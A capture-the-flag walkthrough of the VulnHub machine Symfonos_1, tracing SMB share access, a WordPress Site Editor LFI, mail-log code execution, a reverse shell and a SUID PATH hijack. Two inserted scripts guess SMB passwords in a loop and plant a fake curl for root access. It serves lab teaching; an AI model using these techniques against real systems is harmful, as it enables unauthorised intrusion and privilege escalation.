Thursday, February 10, 2022

Symfonos_1


- Layout for this exercise:










1 - INTRODUCTION

 - The goal of this exercise is to develop a hacking process for the vulnerable machine Symfonos_1, from the VulnHub pentesting platform.

Symfonos_1 can be downloaded from here:

https://www.vulnhub.com/entry/symfonos-1,322/

- Once the virtual machine is downloaded, extracted and imported into VirtualBox:



2 - ENUMERATION

- Discovering IP 192.168.1.35 with netdiscover:






- Scanning ports with Nmap:





- Enumerating with enum4linux:




- So there is one user, helios, and two shares, helios and anonymous.

- Accessing the anonymous share (no credentials needed) and retrieving the file attention.txt:




- Reading attention.txt, we find three candidate passwords:





- The second password, qwerty, lets user helios into the helios share, which holds two files, research.txt and todo.txt:
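The share access above boils down to a null session for the anonymous share and a short credential loop for helios. Here it is as an added example (not the write-up's own commands), assuming the target address 192.168.1.35 from the netdiscover step, the share and user names enum4linux reported, and that the three candidates from attention.txt have been saved one per line in a local file (assumed name: candidates.txt):

```shell
#!/bin/sh
# Added example, not the write-up's own commands. Assumptions: target address
# 192.168.1.35 (from netdiscover above), share/user names from enum4linux
# (anonymous, helios), and the attention.txt candidates stored one per line
# in a local file (assumed name: candidates.txt).
TARGET="${TARGET:-192.168.1.35}"

# Fetch attention.txt from the anonymous share with a null session (-N).
fetch_attention() {
    smbclient "//$TARGET/anonymous" -N -c 'get attention.txt'
}

# Try each candidate password against //TARGET/share as user. Print the first
# one smbclient accepts and return 0; return 1 if none works. "-c ls" makes
# smbclient run a single command and exit non-zero on NT_STATUS_LOGON_FAILURE
# instead of dropping into an interactive prompt.
try_smb_passwords() {
    share="$1"; user="$2"; pwfile="$3"
    while IFS= read -r pw || [ -n "$pw" ]; do
        [ -z "$pw" ] && continue
        if smbclient "//$TARGET/$share" -U "$user%$pw" -c ls >/dev/null 2>&1; then
            printf '%s\n' "$pw"
            return 0
        fi
    done < "$pwfile"
    return 1
}

# Usage on the attacking box:
#   fetch_attention
#   pw="$(try_smb_passwords helios helios candidates.txt)"      # prints: qwerty
#   smbclient "//$TARGET/helios" -U "helios%$pw" -c 'get research.txt; get todo.txt'
```

The loop stops at the first accepted password, so the remaining candidates are never sent; against a real domain that matters, because lockout policies count failures per account.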





 
- research.txt and todo.txt point us to the web folder /h3l105:




- Browsing the web server:






- Going to /h3l105 we find a WordPress site:






- Scanning the site with WPScan we find a folder /uploads:









- Under /uploads there is a siteeditor folder:




3 - EXPLOITATION

- Site Editor 1.1.1 is a WordPress plugin vulnerable to Local File Inclusion (LFI), CVE-2018-7422:









- Pasting the exploit's proof-of-concept URL into the browser confirms that Symfonos1 is vulnerable to LFI:








- Now let's get PHP code onto the box through the SMTP server: a mail sent on port 25 to the local user helios is written to helios' mailbox, a file the LFI can include, so any PHP placed in the mail body is executed by the web server:





- Adapting the proof of concept to run the command pwd:








- Same with the command id:








- Finally let's try to execute a Netcat reverse shell:





- Setting up a listener:





- Passing the payload in the URL and sending the request:





- The reverse shell connects back to the listener:





- Upgrading the shell to a proper TTY and changing to helios' home directory:












4 - PRIVILEGE ESCALATION

- Looking for files with the SUID bit set:





- Exploring /opt/statuscheck:





- Running strings on /opt/statuscheck:




- So /opt/statuscheck calls curl by bare name, with no absolute path, which means $PATH decides which curl gets executed.

- The privilege escalation idea is to write a fake curl as a shell script, store it in /tmp, and prepend /tmp to PATH so that the SUID binary runs our curl instead of the real one.

- The real location of curl:








- Going to /tmp and creating a fake curl:




- Prepending /tmp to PATH:






- Now /opt/statuscheck finds curl in /tmp first, and a root shell is obtained:
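The PATH hijack above, as an added example (not the write-up's own commands). A SUID-root binary cannot be created on the fly, so a stand-in script that calls curl by bare name (assumed to match what strings showed) takes the place of /opt/statuscheck; everything else, the fake curl and the PATH change, is exactly what is done on the target:

```shell
#!/bin/sh
# Added example, not the write-up's own commands. On Symfonos_1 the caller is
# the SUID-root /opt/statuscheck; here a stand-in script that calls "curl" by
# bare name (assumed to match what strings showed) plays its part, so the PATH
# lookup can be exercised offline.
WORK="$(mktemp -d)"

# Stand-in for /opt/statuscheck: the real binary ends up doing the equivalent
# of this line, "curl" with no absolute path, so $PATH decides which curl runs.
make_statuscheck() {
    cat > "$WORK/statuscheck" <<'EOF'
#!/bin/sh
curl -I http://localhost
EOF
    chmod +x "$WORK/statuscheck"
}

# Fake curl dropped into an attacker-writable directory ($1, /tmp on the box).
# The write-up's version spawns a shell, which under a SUID-root caller is a
# root shell (use "bash -p": without -p, bash resets the effective uid to the
# real uid when they differ). This version only reports which curl ran and as
# whom, so the result can be checked.
make_fake_curl() {
    mkdir -p "$1"
    cat > "$1/curl" <<'EOF'
#!/bin/sh
# on the target this line would be:  /bin/bash -p
echo "hijacked curl, euid=$(id -u), argv=$*"
EOF
    chmod +x "$1/curl"
}

# Which "curl" does a bare-name lookup resolve to under a given PATH?
# Compare with the real one: "command -v curl" before the change.
resolve_curl() {
    ( export PATH="$1"; command -v curl )
}

# Run the stand-in statuscheck with the fake-curl directory prepended to PATH,
# which is what "export PATH=/tmp:$PATH; /opt/statuscheck" does on the target.
hijack() {
    PATH="$1:$PATH" "$WORK/statuscheck"
}

cleanup() { rm -rf "$WORK"; }

# Usage:
#   make_statuscheck; make_fake_curl "$WORK/tmp"
#   resolve_curl "$WORK/tmp:$PATH"   # prints $WORK/tmp/curl, not /usr/bin/curl
#   hijack "$WORK/tmp"               # prints: hijacked curl, euid=<your uid>, argv=-I http://localhost
#   cleanup
```

The same check works defensively: any SUID binary whose strings output shows a bare program name next to a system() or execvp() call is a candidate, and the fix is to call the helper by absolute path or to reset PATH inside the binary before spawning anything.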





5 - CAPTURING THE FLAG

- Reading proof.txt: